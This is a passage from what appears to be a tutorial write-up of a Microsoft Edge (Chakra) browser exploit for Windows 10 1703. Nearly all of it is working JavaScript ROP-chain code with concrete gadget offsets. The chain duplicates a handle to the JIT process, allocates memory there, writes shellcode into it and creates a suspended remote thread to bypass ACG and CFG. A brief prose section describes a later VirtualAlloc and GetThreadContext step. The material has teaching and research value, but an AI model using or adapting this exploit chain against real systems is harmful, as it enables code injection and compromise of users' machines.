write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

Before the call:

After the call:

Again, this is identical to last time and we use the ropoffsetTwo variable here, which is just used to essentially calculate the offset from where our VirtualProtect ROP chain began to the actual address within the ROP chain we want to update (lpAddress and our “fake” return address we want our ROP chain to jump to).

VirtualAlloc ROP Chain

This next function call may seem a bit confusing - a call to VirtualAlloc. We don’t really need to call this function, from an exploitation technique perspective. We will (after this function call) make a call to GetThreadContext to retrieve the state of the CPU registers for our previously created thread within the JIT process so that we can leak the value of RSP and eventually write our final ROP chain there. A GetThreadContext call expects a pointer to a CONTEXT structure - where the function will go and fill our the structure with the current CPU register state of a given thread (our remotely created thread).

On the current version of Windows used to develop this exploit, Windows 10 1703, a CONTEXT structure is 0x4d0 bytes in size. So, we will be setting up a call to VirtualAlloc to allocate 0x4d0 bytes of memory to store this structure for later usage.

Here is how our call will be setup:

VirtualAlloc(
	NULL,				// Let the system decide where to allocate the memory
	sizeof(CONTEXT),		// The size we want to allocate (size of a CONTEXT structure)
	MEM_COMMIT | MEM_RESERVE,	// Make sure this memory is committed and reserved
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);

Here is how this looks with ROP (with all previous ROP chains for context):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
